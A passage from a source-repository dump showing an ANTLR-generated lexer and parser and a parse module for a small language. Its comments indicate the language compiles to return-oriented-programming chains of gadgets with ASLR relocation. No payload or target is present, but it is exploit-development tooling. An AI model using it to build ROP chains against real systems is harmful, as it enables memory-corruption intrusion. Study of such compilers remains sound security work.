buf.write(u"%\3%\3%\3%\3%\3\u00dd\2&\3\3\5\4\7\5\t\6\13\7\r\b\17") 33 | buf.write(u"\t\21\n\23\13\25\f\27\r\31\16\33\17\35\20\37\21!\22#") 34 | buf.write(u"\23%\24\'\25)\26+\27-\30/\31\61\32\63\33\65\34\67\35") 35 | buf.write(u"9\2;\2=\2?\2A\2C\2E\36G\37I \3\2\n\4\2ZZzz\4\2$$^^\5") 36 | buf.write(u"\2C\\aac|\3\2\62;\5\2\62;CHch\5\2$$^^pp\4\2\13\13\"\"") 37 | buf.write(u"\4\2\f\f\17\17\u00ee\2\3\3\2\2\2\2\5\3\2\2\2\2\7\3\2") 38 | buf.write(u"\2\2\2\t\3\2\2\2\2\13\3\2\2\2\2\r\3\2\2\2\2\17\3\2\2") 39 | buf.write(u"\2\2\21\3\2\2\2\2\23\3\2\2\2\2\25\3\2\2\2\2\27\3\2\2") 40 | buf.write(u"\2\2\31\3\2\2\2\2\33\3\2\2\2\2\35\3\2\2\2\2\37\3\2\2") 41 | buf.write(u"\2\2!\3\2\2\2\2#\3\2\2\2\2%\3\2\2\2\2\'\3\2\2\2\2)\3") 42 | buf.write(u"\2\2\2\2+\3\2\2\2\2-\3\2\2\2\2/\3\2\2\2\2\61\3\2\2\2") 43 | buf.write(u"\2\63\3\2\2\2\2\65\3\2\2\2\2\67\3\2\2\2\2E\3\2\2\2\2") 44 | buf.write(u"G\3\2\2\2\2I\3\2\2\2\3K\3\2\2\2\5M\3\2\2\2\7O\3\2\2\2") 45 | buf.write(u"\tQ\3\2\2\2\13S\3\2\2\2\rW\3\2\2\2\17]\3\2\2\2\21c\3") 46 | buf.write(u"\2\2\2\23h\3\2\2\2\25j\3\2\2\2\27l\3\2\2\2\31n\3\2\2") 47 | buf.write(u"\2\33p\3\2\2\2\35r\3\2\2\2\37t\3\2\2\2!v\3\2\2\2#x\3") 48 | buf.write(u"\2\2\2%z\3\2\2\2\'|\3\2\2\2)~\3\2\2\2+\u0080\3\2\2\2") 49 | buf.write(u"-\u0082\3\2\2\2/\u0084\3\2\2\2\61\u008e\3\2\2\2\63\u0091") 50 | buf.write(u"\3\2\2\2\65\u0099\3\2\2\2\67\u00a2\3\2\2\29\u00a9\3\2") 51 | buf.write(u"\2\2;\u00af\3\2\2\2=\u00b1\3\2\2\2?\u00b3\3\2\2\2A\u00b5") 52 | buf.write(u"\3\2\2\2C\u00c1\3\2\2\2E\u00c4\3\2\2\2G\u00cd\3\2\2\2") 53 | buf.write(u"I\u00d7\3\2\2\2KL\7}\2\2L\4\3\2\2\2MN\7\177\2\2N\6\3") 54 | buf.write(u"\2\2\2OP\7=\2\2P\b\3\2\2\2QR\7\f\2\2R\n\3\2\2\2ST\7x") 55 | buf.write(u"\2\2TU\7c\2\2UV\7t\2\2V\f\3\2\2\2WX\7e\2\2XY\7q\2\2Y") 56 | buf.write(u"Z\7p\2\2Z[\7u\2\2[\\\7v\2\2\\\16\3\2\2\2]^\7c\2\2^_\7") 57 | buf.write(u"t\2\2_`\7t\2\2`a\7c\2\2ab\7{\2\2b\20\3\2\2\2cd\7h\2\2") 58 | buf.write(u"de\7w\2\2ef\7p\2\2fg\7e\2\2g\22\3\2\2\2hi\7*\2\2i\24") 59 | buf.write(u"\3\2\2\2jk\7+\2\2k\26\3\2\2\2lm\7]\2\2m\30\3\2\2\2no") 60 | buf.write(u"\7_\2\2o\32\3\2\2\2pq\7>\2\2q\34\3\2\2\2rs\7.\2\2s\36") 61 | buf.write(u"\3\2\2\2tu\7@\2\2u \3\2\2\2vw\7-\2\2w\"\3\2\2\2xy\7/") 62 | buf.write(u"\2\2y$\3\2\2\2z{\7,\2\2{&\3\2\2\2|}\7\61\2\2}(\3\2\2") 63 | buf.write(u"\2~\177\7`\2\2\177*\3\2\2\2\u0080\u0081\7~\2\2\u0081") 64 | buf.write(u",\3\2\2\2\u0082\u0083\7(\2\2\u0083.\3\2\2\2\u0084\u0089") 65 | buf.write(u"\5=\37\2\u0085\u0088\5=\37\2\u0086\u0088\5? \2\u0087") 66 | buf.write(u"\u0085\3\2\2\2\u0087\u0086\3\2\2\2\u0088\u008b\3\2\2") 67 | buf.write(u"\2\u0089\u0087\3\2\2\2\u0089\u008a\3\2\2\2\u008a\60\3") 68 | buf.write(u"\2\2\2\u008b\u0089\3\2\2\2\u008c\u008f\5\63\32\2\u008d") 69 | buf.write(u"\u008f\5\65\33\2\u008e\u008c\3\2\2\2\u008e\u008d\3\2") 70 | buf.write(u"\2\2\u008f\62\3\2\2\2\u0090\u0092\7/\2\2\u0091\u0090") 71 | buf.write(u"\3\2\2\2\u0091\u0092\3\2\2\2\u0092\u0094\3\2\2\2\u0093") 72 | buf.write(u"\u0095\5? \2\u0094\u0093\3\2\2\2\u0095\u0096\3\2\2\2") 73 | buf.write(u"\u0096\u0094\3\2\2\2\u0096\u0097\3\2\2\2\u0097\64\3\2") 74 | buf.write(u"\2\2\u0098\u009a\7/\2\2\u0099\u0098\3\2\2\2\u0099\u009a") 75 | buf.write(u"\3\2\2\2\u009a\u009b\3\2\2\2\u009b\u009c\7\62\2\2\u009c") 76 | buf.write(u"\u009e\t\2\2\2\u009d\u009f\5A!\2\u009e\u009d\3\2\2\2") 77 | buf.write(u"\u009f\u00a0\3\2\2\2\u00a0\u009e\3\2\2\2\u00a0\u00a1") 78 | buf.write(u"\3\2\2\2\u00a1\66\3\2\2\2\u00a2\u00a4\7$\2\2\u00a3\u00a5") 79 | buf.write(u"\59\35\2\u00a4\u00a3\3\2\2\2\u00a4\u00a5\3\2\2\2\u00a5") 80 | buf.write(u"\u00a6\3\2\2\2\u00a6\u00a7\7$\2\2\u00a78\3\2\2\2\u00a8") 81 | buf.write(u"\u00aa\5;\36\2\u00a9\u00a8\3\2\2\2\u00aa\u00ab\3\2\2") 82 | buf.write(u"\2\u00ab\u00a9\3\2\2\2\u00ab\u00ac\3\2\2\2\u00ac:\3\2") 83 | buf.write(u"\2\2\u00ad\u00b0\n\3\2\2\u00ae\u00b0\5C\"\2\u00af\u00ad") 84 | buf.write(u"\3\2\2\2\u00af\u00ae\3\2\2\2\u00b0<\3\2\2\2\u00b1\u00b2") 85 | buf.write(u"\t\4\2\2\u00b2>\3\2\2\2\u00b3\u00b4\t\5\2\2\u00b4@\3") 86 | buf.write(u"\2\2\2\u00b5\u00b6\t\6\2\2\u00b6B\3\2\2\2\u00b7\u00b8") 87 | buf.write(u"\7^\2\2\u00b8\u00c2\t\7\2\2\u00b9\u00ba\7^\2\2\u00ba") 88 | buf.write(u"\u00bb\7z\2\2\u00bb\u00bd\3\2\2\2\u00bc\u00be\5A!\2\u00bd") 89 | buf.write(u"\u00bc\3\2\2\2\u00be\u00bf\3\2\2\2\u00bf\u00bd\3\2\2") 90 | buf.write(u"\2\u00bf\u00c0\3\2\2\2\u00c0\u00c2\3\2\2\2\u00c1\u00b7") 91 | buf.write(u"\3\2\2\2\u00c1\u00b9\3\2\2\2\u00c2D\3\2\2\2\u00c3\u00c5") 92 | buf.write(u"\t\b\2\2\u00c4\u00c3\3\2\2\2\u00c5\u00c6\3\2\2\2\u00c6") 93 | buf.write(u"\u00c4\3\2\2\2\u00c6\u00c7\3\2\2\2\u00c7\u00c8\3\2\2") 94 | buf.write(u"\2\u00c8\u00c9\b#\2\2\u00c9F\3\2\2\2\u00ca\u00cb\7\61") 95 | buf.write(u"\2\2\u00cb\u00ce\7\61\2\2\u00cc\u00ce\7%\2\2\u00cd\u00ca") 96 | buf.write(u"\3\2\2\2\u00cd\u00cc\3\2\2\2\u00ce\u00d2\3\2\2\2\u00cf") 97 | buf.write(u"\u00d1\n\t\2\2\u00d0\u00cf\3\2\2\2\u00d1\u00d4\3\2\2") 98 | buf.write(u"\2\u00d2\u00d0\3\2\2\2\u00d2\u00d3\3\2\2\2\u00d3\u00d5") 99 | buf.write(u"\3\2\2\2\u00d4\u00d2\3\2\2\2\u00d5\u00d6\b$\2\2\u00d6") 100 | buf.write(u"H\3\2\2\2\u00d7\u00d8\7\61\2\2\u00d8\u00d9\7,\2\2\u00d9") 101 | buf.write(u"\u00dd\3\2\2\2\u00da\u00dc\13\2\2\2\u00db\u00da\3\2\2") 102 | buf.write(u"\2\u00dc\u00df\3\2\2\2\u00dd\u00de\3\2\2\2\u00dd\u00db") 103 | buf.write(u"\3\2\2\2\u00de\u00e0\3\2\2\2\u00df\u00dd\3\2\2\2\u00e0") 104 | buf.write(u"\u00e1\7,\2\2\u00e1\u00e2\7\61\2\2\u00e2\u00e3\3\2\2") 105 | buf.write(u"\2\u00e3\u00e4\b%\2\2\u00e4J\3\2\2\2\23\2\u0087\u0089") 106 | buf.write(u"\u008e\u0091\u0096\u0099\u00a0\u00a4\u00ab\u00af\u00bf") 107 | buf.write(u"\u00c1\u00c6\u00cd\u00d2\u00dd\3\b\2\2") 108 | return buf.getvalue() 109 | 110 | 111 | class proLexer(Lexer): 112 | 113 | atn = ATNDeserializer().deserialize(serializedATN()) 114 | 115 | decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ] 116 | 117 | 118 | T__0 = 1 119 | T__1 = 2 120 | T__2 = 3 121 | T__3 = 4 122 | T__4 = 5 123 | T__5 = 6 124 | T__6 = 7 125 | T__7 = 8 126 | T__8 = 9 127 | T__9 = 10 128 | T__10 = 11 129 | T__11 = 12 130 | T__12 = 13 131 | T__13 = 14 132 | T__14 = 15 133 | T__15 = 16 134 | T__16 = 17 135 | T__17 = 18 136 | T__18 = 19 137 | T__19 = 20 138 | T__20 = 21 139 | T__21 = 22 140 | Identifier = 23 141 | Constant = 24 142 | Decimal = 25 143 | Hexadecimal = 26 144 | String = 27 145 | Whitespace = 28 146 | LineComment = 29 147 | BlockComment = 30 148 | 149 | modeNames = [ u"DEFAULT_MODE" ] 150 | 151 | literalNames = [ u"", 152 | u"'{'", u"'}'", u"';'", u"'\n'", u"'var'", u"'const'", u"'array'", 153 | u"'func'", u"'('", u"')'", u"'['", u"']'", u"'<'", u"','", u"'>'", 154 | u"'+'", u"'-'", u"'*'", u"'/'", u"'^'", u"'|'", u"'&'" ] 155 | 156 | symbolicNames = [ u"", 157 | u"Identifier", u"Constant", u"Decimal", u"Hexadecimal", u"String", 158 | u"Whitespace", u"LineComment", u"BlockComment" ] 159 | 160 | ruleNames = [ u"T__0", u"T__1", u"T__2", u"T__3", u"T__4", u"T__5", 161 | u"T__6", u"T__7", u"T__8", u"T__9", u"T__10", u"T__11", 162 | u"T__12", u"T__13", u"T__14", u"T__15", u"T__16", u"T__17", 163 | u"T__18", u"T__19", u"T__20", u"T__21", u"Identifier", 164 | u"Constant", u"Decimal", u"Hexadecimal", u"String", u"Char_sequence", 165 | u"Char", u"Nondigit", u"Digit", u"Hexdigit", u"Escape_sequence", 166 | u"Whitespace", u"LineComment", u"BlockComment" ] 167 | 168 | grammarFileName = u"pro.g4" 169 | 170 | def __init__(self, input=None): 171 | super(proLexer, self).__init__(input) 172 | self.checkVersion("4.5.2") 173 | self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache()) 174 | self._actions = None 175 | self._predicates = None 176 | 177 | 178 | -------------------------------------------------------------------------------- /pro/parse/__init__.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import antlr4 3 | from collections import OrderedDict 4 | from .proLexer import proLexer 5 | from .proParser import proParser 6 | from .proVisitor import proVisitor 7 | from .proErrorListener import proErrorListener 8 | 9 | class SemanticError(Exception): 10 | pass 11 | 12 | class Expression(object): 13 | constant = None 14 | _value = None 15 | 16 | @property 17 | def value(self): 18 | if self._value is not None: 19 | return self._value 20 | self._value = self.eval() 21 | return self._value 22 | 23 | def eval(self, ctx=None): 24 | return self._value 25 | 26 | class BinaryExpression(Expression): 27 | def __init__(self, op, el, er): 28 | if not op in '+-*/^|&': 29 | raise SemanticError('unsupported op %s' % op) 30 | self.op = op 31 | 32 | if el.constant is False or er.constant is False: 33 | raise SemanticError('expression should be constant') 34 | 35 | self.constant = True 36 | self.expr_left = el 37 | self.expr_right = er 38 | 39 | def eval(self, ctx=None): 40 | lv = self.expr_left.eval(ctx) 41 | rv = self.expr_right.eval(ctx) 42 | if isinstance(lv, Address): 43 | # Address arithmetic 44 | if self.op == '+': 45 | return Address(lv.base, lv.offset + rv) 46 | elif self.op == '-': 47 | return Address(lv.base, lv.offset - rv) 48 | return eval('%d %s %d' % (lv, self.op, rv)) 49 | 50 | def __repr__(self): 51 | try: 52 | return '(%r %s %r)' % (self.expr_left, self.op, self.expr_right) 53 | except TypeError: 54 | raise SemanticError('invalid binary operation') 55 | 56 | class UnaryExpression(Expression): 57 | def __init__(self, op, e): 58 | if not op in '&': 59 | raise SemanticError('unsupported op %s' % op) 60 | self.op = op 61 | 62 | if not isinstance(e, (Var, Array)): 63 | raise SemanticError('invalid L-value') 64 | 65 | self.constant = True 66 | self.expr = e 67 | 68 | def eval(self, ctx=None): 69 | return self.expr.addr 70 | 71 | def __repr__(self): 72 | return '%s%r' % (self.op, self.expr) 73 | 74 | class Symbol(Expression): 75 | constant = False 76 | def __init__(self, name): 77 | super(Symbol, self).__init__() 78 | self.name = name 79 | 80 | self._base = '_DATA' 81 | self._offset = None 82 | 83 | @property 84 | def addr(self): 85 | return Address(self._base, self._offset) 86 | 87 | def __str__(self): 88 | return self.name 89 | 90 | class Array(Symbol): 91 | constant = True 92 | def __init__(self, name, initializer): 93 | super(Array, self).__init__(name) 94 | 95 | if not isinstance(initializer, Expression) or not initializer.constant: 96 | raise SemanticError('invalid array "%s"' % name) 97 | 98 | if isinstance(initializer, String): 99 | self.size = initializer.size 100 | self.data = initializer.value 101 | elif isinstance(initializer, Array): 102 | self.size = initializer.size 103 | self.data = initializer.data 104 | else: 105 | self.size = initializer.value 106 | self.data = '\x00' * self.size 107 | 108 | if len(self.data) > self.size: 109 | raise SemanticError('inconsitent array initializer') 110 | 111 | def eval(self, ctx=None): 112 | return self.addr 113 | 114 | def __repr__(self): 115 | data = self.data if len(self.data) < 0x20 else self.data[:0x20] + '...' 116 | return 'array %s[%d] = %r' % (self.name, self.size, data) 117 | 118 | class Const(Symbol): 119 | constant = True 120 | def __init__(self, name, initializer): 121 | super(Const, self).__init__(name) 122 | if not isinstance(initializer, Expression) or not initializer.constant: 123 | raise SemanticError('invalid const initializer for "%s"' % name) 124 | self.size = 0 125 | self._value = initializer.value 126 | 127 | def __repr__(self): 128 | return '%s = %#x' % (self.name, self.value) 129 | 130 | class Func(Symbol): 131 | constant = True 132 | def __init__(self, name, initializer): 133 | super(Func, self).__init__(name) 134 | self._base = initializer[0] 135 | self._offset = initializer[1] if len(initializer) > 1 else 0 136 | self.parse_signature(initializer[2] if len(initializer) > 2 else None) 137 | self.size = 0 138 | 139 | def eval(self, ctx=None): 140 | return self.addr 141 | 142 | def __repr__(self): 143 | return '%s = %r' % (self.name, self.addr) 144 | 145 | def __getattr__(self, name): 146 | if self.attr is not None and name in self.attr: 147 | return True 148 | return None 149 | 150 | def parse_signature(self, sig=None): 151 | ''' Func(gadget) signature is Input, Output, Clobber, Attributes. 152 | Input/Output/Clobber are sets of registers, Attributes is special 153 | hint for compiler. They are seperated by ':', the registers in set 154 | are seperated by ','. If not signature is provided, the Func will 155 | be called with default calling convention. 156 | 157 | Current Attributes: 158 | va variable arguments 159 | align call stack should be aligned 160 | ''' 161 | if sig is None: 162 | self.input = None 163 | self.output = None 164 | self.clobber = None 165 | self.attr = set() 166 | return 167 | 168 | regsets = [] 169 | 170 | for regset in sig.split(':'): 171 | if regset == '': 172 | regsets.append([]) 173 | else: 174 | regsets.append(regset.split(',')) 175 | 176 | while len(regsets) < 4: 177 | regsets.append([]) 178 | 179 | self.input = regsets[0] 180 | self.output = regsets[1] 181 | self.clobber = regsets[2] 182 | self.attr = set(regsets[3]) 183 | 184 | 185 | class Var(Symbol): 186 | constant = False 187 | def __init__(self, name, initializer): 188 | super(Var, self).__init__(name) 189 | self.size = 8 190 | if isinstance(initializer, Expression): 191 | if not initializer.constant: 192 | raise SemanticError('invalid var "%s"' % name) 193 | self._value = initializer.value 194 | 195 | def __repr__(self): 196 | r = 'var %s' % (self.name) 197 | if self._value: 198 | r += ' %#x' % self._value 199 | return r 200 | 201 | class String(Expression): 202 | constant = True 203 | def __init__(self, value): 204 | self._value = value 205 | self.size = len(value) + 8 - len(value) % 8 206 | 207 | def __repr__(self): 208 | return `self._value` 209 | 210 | class Int(Expression): 211 | constant = True 212 | def __init__(self, value): 213 | if isinstance(value, (int, long)): 214 | self._value = value 215 | elif isinstance(value, (str, unicode)) and '0x' in value.lower(): 216 | self._value = int(value, 16) 217 | else: 218 | self._value = int(value) 219 | 220 | def __repr__(self): 221 | return '%#x' % self._value 222 | 223 | class Address(BinaryExpression): 224 | def __init__(self, base, offset): 225 | super(Address, self).__init__('+', String(base), Int(offset)) 226 | self.base = self.expr_left.value 227 | self.offset = self.expr_right.value 228 | 229 | def eval(self, ctx=None): 230 | if ctx is None: 231 | return (self.base, self.offset) 232 | else: 233 | base = ctx.get(self.base, None) 234 | if base is None: 235 | raise AttributeError('no relocating information for "%s"' % self.base) 236 | return base + self.offset 237 | 238 | def __repr__(self): 239 | return '<%s, %#x>' % (self.base, self.offset) 240 | 241 | class Environment(): 242 | def __init__(self): 243 | self.vars = OrderedDict() 244 | self._offset = 0 245 | 246 | def __setitem__(self, key, value): 247 | if key in self.vars: 248 | raise SemanticError('duplicated variable "%s"' % key) 249 | if value.name is None: 250 | if not isinstance(value, Array): 251 | raise SemanticError('anonymous symbol is not allowed for %r' % type(value)) 252 | value.name = 'off_%x' % (self._offset) 253 | if not isinstance(value, (Const, Func)): 254 | # Const and Func are immediates in rop chain(.code), they do not 255 | # appear in .data 256 | value._offset = self._offset 257 | self._offset += value.size 258 | self.vars[key] = value 259 | 260 | def __getitem__(self, key): 261 | if not key in self.vars: 262 | raise SemanticError('undefined variable "%s"' % key) 263 | return self.vars[key] 264 | 265 | def __contains__(self, key): 266 | return key in self.vars 267 | 268 | @property 269 | def size(self): 270 | return self._offset 271 | 272 | def __repr__(self): 273 | r = '' 274 | for cls in (Const, Func, Var, Array): 275 | r += cls.__name__ + '\n' 276 | r += '\n'.join(map(repr, (v for v in self.vars.itervalues() if isinstance(v, cls)))) 277 | r += '\n\n' 278 | return r 279 | 280 | class Call(object): 281 | ''' a Call is `ret/jmp to a gadget with arguments` ''' 282 | def __init__(self, func, args): 283 | self.func = func 284 | self.args = args 285 | if isinstance(func, Func) and func.sig is not None: 286 | # check signature if it's not a function with variable arguments 287 | reg_in = func.sig['input'] 288 | if len(reg_in) != len(args) and func.va is not True: 289 | raise SemanticError('"%s" takes %d parameters, but %d is provided' % (func, len(reg_in), len(args))) 290 | elif isinstance(func, Const) and func.name == 'inline': 291 | for arg in args: 292 | if not arg.constant: 293 | raise SemanticError('"%s" is not a constant in inline statement' % arg) 294 | 295 | def __repr__(self): 296 | return '%s(%s)' % (self.func.name, ', '.join(map(repr, self.args))) 297 | 298 | class Program(proVisitor): 299 | def __init__(self, **kwargs): 300 | super(proVisitor, self).__init__(**kwargs) 301 | 302 | self.name = None 303 | self.env = Environment() 304 | 305 | # builtin variables 306 | self.env['undefined'] = Const('undefined', Int(0)) 307 | self.env['inline'] = Const('inline', Int(1)) 308 | 309 | def visitProgram(self, ctx): 310 | name = ctx.Identifier().getText() 311 | self.name = name 312 | statements = [] 313 | for stmt in ctx.statement(): 314 | if stmt.declaration(): 315 | self.visitDeclaration(stmt.declaration()) 316 | elif stmt.call_statement(): 317 | statements.append(self.visitCall_statement(stmt.call_statement())) 318 | self.statements = statements 319 | 320 | def visitDeclaration(self, ctx): 321 | type = ctx.type_specifier().getText() 322 | name = ctx.Identifier().getText() 323 | 324 | initializer = None 325 | if ctx.initializer(): 326 | initializer = self.visitInitializer(ctx.initializer(), name, type) 327 | 328 | cls = {'var':Var, 'func':Func, 'array':Array, 'const':Const}[type] 329 | self.env[name] = cls(name, initializer) 330 | 331 | def visitInitializer(self, ctx, name, type): 332 | if type == 'func': 333 | if not ctx.func_initializer(): 334 | raise SemanticError('function initializer required for "%s"' % name) 335 | elif type == 'array': 336 | if not ctx.array_initializer(): 337 | raise SemanticError('array initializer required for "%s"' % name) 338 | elif type == 'const' or type == 'var': 339 | if not ctx.expression_initializer(): 340 | raise SemanticError('expression initializer required for "%s"' % name) 341 | return self.visitChildren(ctx) 342 | 343 | def visitExpression_initializer(self, ctx): 344 | return self.visitExpression(ctx.expression()) 345 | 346 | def visitArray_initializer(self, ctx): 347 | return self.visitExpression(ctx.expression()) 348 | 349 | def visitFunc_initializer(self, ctx): 350 | base = ctx.Identifier().getText() 351 | offset = ctx.Constant().getText() if ctx.Constant() else 0 352 | signature = ctx.String().getText()[1:-1].decode('string-escape') if ctx.String() else None 353 | return (base, offset, signature) 354 | 355 | def visitBinary_expression(self, ctx): 356 | el = self.visitPrimary_expression(ctx.getChild(0)) 357 | op = ctx.binary_operator().getText() 358 | er = self.visitPrimary_expression(ctx.getChild(2)) 359 | return BinaryExpression(op, el, er) 360 | 361 | def visitUnary_expression(self, ctx): 362 | op = ctx.unary_operator().getText() 363 | e = self.visitPrimary_expression(ctx.primary_expression()) 364 | return UnaryExpression(op, e) 365 | 366 | def visitPrimary_expression(self, ctx): 367 | if ctx.Identifier(): 368 | var = ctx.Identifier().getText() 369 | return self.env[var] 370 | elif ctx.Constant(): 371 | return Int(ctx.Constant().getText()) 372 | elif ctx.String(): 373 | s = ctx.String().getText()[1:-1].decode('string-escape') 374 | _s = '$' + s 375 | if _s not in self.env: 376 | self.env[_s] = Array(None, String(s)) 377 | return self.env[_s] 378 | elif ctx.expression(): 379 | return self.visitExpression(ctx.expression()) 380 | else: 381 | raise SemanticError('unknown primary expression "%s"' % ctx.getText()) 382 | 383 | def visitCall_statement(self, ctx): 384 | func = self.env[ctx.Identifier().getText()] 385 | if not isinstance(func, (Func, Const, Var)): 386 | # Func will be relocated if ASLR is enabled, however Const/Var 387 | # can also be used a function 388 | raise SemanticError('"%s" is not a function' % func) 389 | args = self.visitArguments(ctx.arguments()) 390 | return Call(func, args) 391 | 392 | def visitArguments(self, ctx): 393 | if ctx is None: 394 | return [] 395 | return self.visitArguments(ctx.arguments()) + [self.visitExpression(ctx.expression())] 396 | 397 | def parse(text): 398 | lexer = proLexer(antlr4.InputStream(text)) 399 | lexer.removeErrorListeners() 400 | lexer.addErrorListener(proErrorListener(text)) 401 | stream = antlr4.CommonTokenStream(lexer) 402 | 403 | parser = proParser(stream) 404 | parser.removeErrorListeners() 405 | parser.addErrorListener(proErrorListener(text)) 406 | tree = parser.program() 407 | 408 | prog = Program() 409 | prog.visit(tree) 410 | return prog 411 | 412 | -------------------------------------------------------------------------------- /pro/parse/proParser.py: -------------------------------------------------------------------------------- 1 | # Generated from pro.g4 by ANTLR 4.5.2 2 | # encoding: utf-8 3 | from __future__ import print_function 4 | from antlr4 import * 5 | from io import StringIO 6 | 7 | def serializedATN(): 8 | with StringIO() as buf: 9 | buf.write(u"\3\u0430\ud6d1\u8206\uad2d\u4417\uaef1\u8d80\uaadd\3") 10 | buf.write(u" \u0081\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t") 11 | buf.write(u"\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r") 12 | buf.write(u"\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\3") 13 | buf.write(u"\2\3\2\3\2\7\2(\n\2\f\2\16\2+\13\2\3\2\3\2\3\3\3\3\3") 14 | buf.write(u"\3\5\3\62\n\3\3\4\3\4\3\5\3\5\3\5\5\59\n\5\3\6\3\6\3") 15 | buf.write(u"\7\3\7\3\7\5\7@\n\7\3\b\3\b\3\b\3\b\3\t\3\t\3\t\3\t\3") 16 | buf.write(u"\n\3\n\3\n\3\n\3\n\3\n\5\nP\n\n\5\nR\n\n\3\n\3\n\3\13") 17 | buf.write(u"\3\13\3\13\5\13Y\n\13\3\13\3\13\3\f\3\f\3\f\3\f\3\f\3") 18 | buf.write(u"\f\7\fc\n\f\f\f\16\ff\13\f\3\r\3\r\3\r\5\rk\n\r\3\16") 19 | buf.write(u"\3\16\3\16\3\16\3\17\3\17\3\17\3\20\3\20\3\21\3\21\3") 20 | buf.write(u"\22\3\22\3\22\3\22\3\22\3\22\3\22\5\22\177\n\22\3\22") 21 | buf.write(u"\2\3\26\23\2\4\6\b\n\f\16\20\22\24\26\30\32\34\36 \"") 22 | buf.write(u"\2\5\3\2\5\6\3\2\7\n\3\2\22\30~\2$\3\2\2\2\4\61\3\2\2") 23 | buf.write(u"\2\6\63\3\2\2\2\b\65\3\2\2\2\n:\3\2\2\2\f?\3\2\2\2\16") 24 | buf.write(u"A\3\2\2\2\20E\3\2\2\2\22I\3\2\2\2\24U\3\2\2\2\26\\\3") 25 | buf.write(u"\2\2\2\30j\3\2\2\2\32l\3\2\2\2\34p\3\2\2\2\36s\3\2\2") 26 | buf.write(u"\2 u\3\2\2\2\"~\3\2\2\2$%\7\31\2\2%)\7\3\2\2&(\5\4\3") 27 | buf.write(u"\2\'&\3\2\2\2(+\3\2\2\2)\'\3\2\2\2)*\3\2\2\2*,\3\2\2") 28 | buf.write(u"\2+)\3\2\2\2,-\7\4\2\2-\3\3\2\2\2.\62\5\24\13\2/\62\5") 29 | buf.write(u"\b\5\2\60\62\5\6\4\2\61.\3\2\2\2\61/\3\2\2\2\61\60\3") 30 | buf.write(u"\2\2\2\62\5\3\2\2\2\63\64\t\2\2\2\64\7\3\2\2\2\65\66") 31 | buf.write(u"\5\n\6\2\668\7\31\2\2\679\5\f\7\28\67\3\2\2\289\3\2\2") 32 | buf.write(u"\29\t\3\2\2\2:;\t\3\2\2;\13\3\2\2\2<@\5\16\b\2=@\5\20") 33 | buf.write(u"\t\2>@\5\22\n\2?<\3\2\2\2?=\3\2\2\2?>\3\2\2\2@\r\3\2") 34 | buf.write(u"\2\2AB\7\13\2\2BC\5\30\r\2CD\7\f\2\2D\17\3\2\2\2EF\7") 35 | buf.write(u"\r\2\2FG\5\30\r\2GH\7\16\2\2H\21\3\2\2\2IJ\7\17\2\2J") 36 | buf.write(u"Q\7\31\2\2KL\7\20\2\2LO\7\32\2\2MN\7\20\2\2NP\7\35\2") 37 | buf.write(u"\2OM\3\2\2\2OP\3\2\2\2PR\3\2\2\2QK\3\2\2\2QR\3\2\2\2") 38 | buf.write(u"RS\3\2\2\2ST\7\21\2\2T\23\3\2\2\2UV\7\31\2\2VX\7\13\2") 39 | buf.write(u"\2WY\5\26\f\2XW\3\2\2\2XY\3\2\2\2YZ\3\2\2\2Z[\7\f\2\2") 40 | buf.write(u"[\25\3\2\2\2\\]\b\f\1\2]^\5\30\r\2^d\3\2\2\2_`\f\3\2") 41 | buf.write(u"\2`a\7\20\2\2ac\5\30\r\2b_\3\2\2\2cf\3\2\2\2db\3\2\2") 42 | buf.write(u"\2de\3\2\2\2e\27\3\2\2\2fd\3\2\2\2gk\5\"\22\2hk\5\32") 43 | buf.write(u"\16\2ik\5\34\17\2jg\3\2\2\2jh\3\2\2\2ji\3\2\2\2k\31\3") 44 | buf.write(u"\2\2\2lm\5\"\22\2mn\5\36\20\2no\5\"\22\2o\33\3\2\2\2") 45 | buf.write(u"pq\5 \21\2qr\5\"\22\2r\35\3\2\2\2st\t\4\2\2t\37\3\2\2") 46 | buf.write(u"\2uv\7\30\2\2v!\3\2\2\2w\177\7\31\2\2x\177\7\32\2\2y") 47 | buf.write(u"\177\7\35\2\2z{\7\13\2\2{|\5\30\r\2|}\7\f\2\2}\177\3") 48 | buf.write(u"\2\2\2~w\3\2\2\2~x\3\2\2\2~y\3\2\2\2~z\3\2\2\2\177#\3") 49 | buf.write(u"\2\2\2\f)\618?OQXdj~") 50 | return buf.getvalue() 51 | 52 | 53 | class proParser ( Parser ): 54 | 55 | grammarFileName = "pro.g4" 56 | 57 | atn = ATNDeserializer().deserialize(serializedATN()) 58 | 59 | decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ] 60 | 61 | sharedContextCache = PredictionContextCache() 62 | 63 | literalNames = [ u"", u"'{'", u"'}'", u"';'", u"'\n'", u"'var'", 64 | u"'const'", u"'array'", u"'func'", u"'('", u"')'", 65 | u"'['", u"']'", u"'<'", u"','", u"'>'", u"'+'", u"'-'", 66 | u"'*'", u"'/'", u"'^'", u"'|'", u"'&'" ] 67 | 68 | symbolicNames = [ u"", u"", u"", u"", 69 | u"", u"", u"", u"", 70 | u"", u"", u"", u"", 71 | u"", u"", u"", u"", 72 | u"", u"", u"", u"", 73 | u"", u"", u"", u"Identifier", 74 | u"Constant", u"Decimal", u"Hexadecimal", u"String", 75 | u"Whitespace", u"LineComment", u"BlockComment" ] 76 | 77 | RULE_program = 0 78 | RULE_statement = 1 79 | RULE_delimiter = 2 80 | RULE_declaration = 3 81 | RULE_type_specifier = 4 82 | RULE_initializer = 5 83 | RULE_expression_initializer = 6 84 | RULE_array_initializer = 7 85 | RULE_func_initializer = 8 86 | RULE_call_statement = 9 87 | RULE_arguments = 10 88 | RULE_expression = 11 89 | RULE_binary_expression = 12 90 | RULE_unary_expression = 13 91 | RULE_binary_operator = 14 92 | RULE_unary_operator = 15 93 | RULE_primary_expression = 16 94 | 95 | ruleNames = [ u"program", u"statement", u"delimiter", u"declaration", 96 | u"type_specifier", u"initializer", u"expression_initializer", 97 | u"array_initializer", u"func_initializer", u"call_statement", 98 | u"arguments", u"expression", u"binary_expression", u"unary_expression", 99 | u"binary_operator", u"unary_operator", u"primary_expression" ] 100 | 101 | EOF = Token.EOF 102 | T__0=1 103 | T__1=2 104 